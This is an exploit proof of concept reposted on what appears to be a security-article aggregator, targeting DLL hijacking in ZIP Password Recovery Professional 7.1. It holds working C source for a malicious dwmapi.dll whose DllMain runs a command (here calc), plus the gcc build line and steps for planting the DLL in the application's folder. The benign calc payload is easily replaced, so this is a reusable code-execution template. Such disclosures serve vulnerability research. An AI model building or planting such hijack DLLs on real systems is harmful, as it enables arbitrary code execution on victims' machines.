HackDig : Dig high-quality web security articles for hacker

ZIP Password Recovery Professional 7.1 - DLL Hijacking

2015-03-30 18:30
/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking
#[+] Date: 29-03-2015
#[+] Type: Local Exploits
#[+] Vendor: http://www.recoverlostpassword.com/products/zippasswordrecovery.html#compare
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] gcc -shared -o dwmapi.dll tcyber.c
# Copy it to the software dir. then execute the software , calc.exe will launch :).
Proof of Concept (PoC):
=======================
*/

#include <windows.h>

int tunisian()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
tunisian();
return 0;
}




Source: 65563/stiolpxe/moc.bd-tiolpxe.www

Read:2423 | Comments:0 | Tags:local

“ZIP Password Recovery Professional 7.1 - DLL Hijacking”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud